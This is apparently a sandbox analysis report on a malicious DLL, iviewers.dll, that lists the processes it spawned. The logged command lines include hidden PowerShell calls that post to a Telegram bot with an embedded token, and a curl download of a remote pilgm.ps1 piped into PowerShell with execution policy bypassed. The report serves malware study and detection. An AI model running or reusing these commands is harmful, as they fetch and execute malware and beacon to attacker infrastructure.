                                                                                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
                                                                                              Imagebase:0xb0000
                                                                                              File size:20'992 bytes
                                                                                              MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
                                                                                              Imagebase:0xe20000
                                                                                              File size:61'440 bytes
                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
                                                                                              Imagebase:0xe20000
                                                                                              File size:61'440 bytes
                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:10
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:11
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:12
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:13
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:14
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:15
                                                                                              Start time:16:32:56
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:16
                                                                                              Start time:16:32:56
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:17
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:18
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:19
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:20
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:21
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:22
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:23
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:24
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:25
                                                                                              Start time:16:33:00
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:26
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:27
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:28
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:29
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:30
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:31
                                                                                              Start time:16:33:01
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:32
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:33
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:34
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
                                                                                              Imagebase:0x8c0000
                                                                                              File size:2'141'552 bytes
                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:35
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:36
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:37
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
                                                                                              Imagebase:0x950000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:38
                                                                                              Start time:16:33:06
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\curl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
                                                                                              Imagebase:0xb40000
                                                                                              File size:470'528 bytes
                                                                                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:39
                                                                                              Start time:16:33:07
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:40
                                                                                              Start time:16:33:07
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:41
                                                                                              Start time:16:33:07
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP"
                                                                                              Imagebase:0x9f0000
                                                                                              File size:46'832 bytes
                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:43
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0xf70000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:44
                                                                                              Start time:16:33:10
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              Imagebase:0x830000
                                                                                              File size:65'440 bytes
                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

